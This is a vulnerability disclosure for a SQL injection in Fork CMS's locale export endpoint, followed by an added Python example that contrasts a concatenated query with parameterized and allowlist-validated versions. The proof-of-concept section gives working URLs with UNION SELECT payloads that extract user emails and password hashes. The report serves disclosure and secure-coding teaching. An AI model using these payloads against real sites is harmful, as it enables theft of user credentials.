SQL Injection in forkcms/forkcms
Reported on
Oct 21st 2021
Description
When an authenticated user exports translations, the user calls a URL like this: http://forkcms.site/private/de/locale/export?token=5z0ao1nk4p&type%5B0%5D=lbl&language%5B0%5D=de
The parameters type[0] and language[0] are both vulnerable to SQL injection.
Proof of Concept
PoC for parameter type[0]
- As an authenticated user, call the URL
http://forkcms.site/private/de/locale/export?token=2m4a1w19v6&type[0]=lb%27)%20union%20select%20users.is_god,TO_BASE64(users.email),%27de2%27,%27de5%27,%27de3%27,%27de4%27,TO_BASE64(users.password)%20from%20users%20--+&language[0]=de
- In this case, you should get an XML file with the users and passwords from the users table (base64 encoded).
- The SQL injection payload decoded looks like this:
') union select users.is_god,TO_BASE64(users.email),'de2','de5','de3','de4',TO_BASE64(users.password) from users --+
PoC for parameter language[0]
- As an authenticated user, call the URL
http://forkcms.site/private/de/locale/export?token=2m4a1w19v6&type[0]=lbl&language[0]=de%27)%20union%20select%20users.is_god,TO_BASE64(users.email),%27de2%27,%27de5%27,%27de3%27,%27de4%27,TO_BASE64(users.password)%20from%20users%20--+
- In this case, you should get an XML file with all translations, but also with users and passwords at the end of the file (base64 encoded).
- The SQL injection payload decoded looks like this:
') union select users.is_god,TO_BASE64(users.email),'de2','de5','de3','de4',TO_BASE64(users.password) from users --+
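The defect the two PoCs above rely on is the same in both parameters: the export query embeds the type[0] and language[0] values directly into a quoted IN (...) list, so a value that starts with ') closes the list and the remainder is parsed as SQL. The following is an added example, not Fork CMS's own code: it uses a constructed SQLite schema (a stand-in for the real locale and users tables), a hypothetical allowlist of translation types, and three export functions. export_vulnerable builds the query by string concatenation, export_parameterized binds the same values as placeholders so the payload is compared as data, and export_hardened additionally rejects any value that is not a known type or a two-letter language code before the query runs.

```python
import re
import sqlite3

# Constructed schema and rows; not the real Fork CMS tables.
SCHEMA = """
CREATE TABLE locale (type TEXT, language TEXT, name TEXT, value TEXT);
CREATE TABLE users (email TEXT, password TEXT);
INSERT INTO locale VALUES ('lbl', 'de', 'Save',  'Speichern');
INSERT INTO locale VALUES ('msg', 'de', 'Saved', 'Gespeichert');
INSERT INTO locale VALUES ('lbl', 'en', 'Save',  'Save');
INSERT INTO users  VALUES ('admin@example.invalid', '<hash placeholder>');
"""

# Hypothetical allowlist of translation types and language-code shape.
ALLOWED_TYPES = {"lbl", "msg", "err", "act"}
LANGUAGE_RE = re.compile(r"[a-z]{2}")


def connect():
    """In-memory database seeded with the constructed rows."""
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    return con


def export_vulnerable(con, types, languages):
    """The pattern behind the report: user values concatenated into IN (...) lists.

    A value such as  de') OR ('1'='1  ends the quoted list early and the rest
    becomes part of the WHERE clause, so the filter no longer limits the rows.
    """
    sql = (
        "SELECT type, language, name, value FROM locale"
        " WHERE type IN ('" + "','".join(types) + "')"
        " AND language IN ('" + "','".join(languages) + "')"
        " ORDER BY type, language, name"
    )
    return con.execute(sql).fetchall()


def export_parameterized(con, types, languages):
    """Same query shape, but every value is bound as a parameter.

    The number of placeholders still comes from the list lengths, which are
    integers under our control; the values themselves never touch the SQL text.
    """
    sql = (
        "SELECT type, language, name, value FROM locale"
        " WHERE type IN (" + ",".join("?" * len(types)) + ")"
        " AND language IN (" + ",".join("?" * len(languages)) + ")"
        " ORDER BY type, language, name"
    )
    return con.execute(sql, [*types, *languages]).fetchall()


def export_hardened(con, types, languages):
    """Allowlist validation first, then the parameterized query.

    Rejecting unknown values up front also gives the application a clear
    place to log the attempt, which is where detection of probing belongs.
    """
    bad = [t for t in types if t not in ALLOWED_TYPES]
    bad += [lang for lang in languages if not LANGUAGE_RE.fullmatch(lang)]
    if bad:
        raise ValueError(f"rejected export filter values: {bad!r}")
    return export_parameterized(con, types, languages)


if __name__ == "__main__":
    con = connect()
    payload = "de') OR ('1'='1"  # closes the quoted list, as the PoC values do
    print("intended filter :", export_vulnerable(con, ["lbl"], ["de"]))
    print("concatenated    :", export_vulnerable(con, ["lbl"], [payload]))
    print("parameterized   :", export_parameterized(con, ["lbl"], [payload]))
    try:
        export_hardened(con, ["lbl"], [payload])
    except ValueError as err:
        print("hardened        :", err)
```

Run stand-alone, the concatenated variant returns every row in the table for the crafted language value, the parameterized variant returns nothing because no language is literally named de') OR ('1'='1, and the hardened variant refuses the request before any SQL executes.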
Impact
An attacker can steal or tamper with data in the database.